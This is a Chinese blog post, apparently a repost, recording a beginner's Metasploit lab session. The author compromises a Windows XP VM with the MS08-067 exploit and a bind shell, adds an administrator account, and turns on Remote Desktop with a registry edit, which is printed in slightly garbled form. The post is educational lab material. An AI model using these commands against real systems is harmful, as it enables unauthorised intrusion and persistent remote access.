zoukankan      html  css  js  c++  java
  • MSF初体验

    最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333….),下面记录一下初步使用Metasploit的过程。
    首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。
    Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
    Metasploit的设计初衷是打造成一个攻击工具开发平台,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
    说再多也不如真情实弹的干不是。
    我用VMware搭建了一个实验环境,下面是网络的拓扑图:

    要做的就是用Kali Linux里的Metasploit入侵WinXP,然后从物理机,也就是Win7的远程桌面连进WinXP 系统。
    首先,在Kali用命令  msfconsole 开启Metasploit。

    然后运行如下命令:
    use exploit/windows/smb/ms08_067_netapi                #使用MS08067漏洞攻击程序
    set LHOST 192.168.116.3                                                      #设置本地主机IP
    set RHOST 192.168.116.116                                                   #设置目标主机IP
    set payload windows/shell_bind_tcp                                 #设置payload
    show options                                                                            #查看设置信息
    exploit                                                                                        #实施攻击
    由图可知,攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。

    添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。
    接下来执行命令 netstat -an 看一下目标主机开放端口的情况。

    发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:
    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

    然后,我们在物理机(Win7)运行 mstsc进行远程桌面连接。

    OK,成功入侵目标主机。
    Metasploit 就是一款这么强大的工具,使渗透测试人员如虎添翼,几个命令就入侵了目标主机。它的强大功能不言而喻。
    接下来,我会继续研究Metasploit的使用,并记录自己的学习过程,希望能给各位一定的帮助。

    转自http://tieba.baidu.com/p/3715441716

    转载请注明出处:云态中国


  • 相关阅读:
    Sprinig.net 双向绑定 Bidirectional data binding and data model management 和 UpdatePanel
    Memcached是什么
    Spring.net 网络示例 codeproject
    jquery.modalbox.show 插件
    UVA 639 Don't Get Rooked
    UVA 539 The Settlers of Catan
    UVA 301 Transportation
    UVA 331 Mapping the Swaps
    UVA 216 Getting in Line
    UVA 10344 23 out of 5
  • 原文地址:https://www.cnblogs.com/cnhacker/p/6994186.html
Copyright © 2011-2022 走看看